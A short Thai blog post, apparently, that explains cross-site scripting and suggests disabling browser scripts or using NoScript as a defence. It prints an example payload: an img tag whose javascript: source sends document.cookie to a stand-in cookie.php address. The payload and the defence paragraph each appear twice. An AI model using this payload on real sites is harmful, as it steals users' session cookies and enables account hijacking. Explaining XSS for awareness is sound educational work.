(XSS (cross site
scripting) เป็นวิธีการยอดนิยมที่แฮคเกอร์รู้จักกันดี
ซี่งเป็นเทคนิคการฝังโค้ดเข้าไปกับหน้าเวปเพจที่มีช่องโหว่
เมื่อผู้ใช้โหลดหน้าเวปเพจไป ค่าที่สำคัญบางอย่าง เช่น ค่าของ cookie, username,
password ,...
ก็อาจจะถูกขโมยไปได้
มาดูตัวอย่างการฝังโค้ดกันเลยดีกว่าคับ
<img src='javascript:alert("HACKED BY ITU"); document.location = "http://www.example.com/cookie.php?cookie="+document.cookie;' />
มาดูตัวอย่างการฝังโค้ดกันเลยดีกว่าคับ
<img src='javascript:alert("HACKED BY ITU"); document.location = "http://www.example.com/cookie.php?cookie="+document.cookie;' />
จะเห็นได้ว่า เมื่อผู้ใช้โหลดรูปขึ้นมา ก็จะมี alert ขึ้นมาว่า
"HACKED BY ITU" ต่อจากนั้นก็จะเปลี่ยนหน้าเวปเพจไปที่ http://www.example.com/cookie.php พร้อมกับ cookie ของคุณ
นั้นหมายความว่า คุณได้โดนขโมย cookie ไปแล้วนั่นเอง...
วิธีป้องกันนะคับ อาจจะไม่ได้ผล 100% แต่ก็สามารถช่วยได้ไม่น้อยทีเดียว
นั่นคือการ Disable Scripting Language ที่ Web Browser
ถ้าใครใช้ firefox ก็โหลด Extension ที่มีชือว่า NoScripts มาลองใช้ดูก็ได้คับ
วิธีป้องกันนะคับ อาจจะไม่ได้ผล 100% แต่ก็สามารถช่วยได้ไม่น้อยทีเดียว
นั่นคือการ Disable Scripting Language ที่ Web Browser
ถ้าใครใช้ firefox ก็โหลด Extension ที่มีชือว่า NoScripts มาลองใช้ดูก็ได้คับ
ลงข้อมูลและแนะนำ Hacker แบบนี้ เยอะๆ น่ะครับ :) รอเว๊บแบบนี้มานานแล้ว
ตอบลบขอบคุณครับ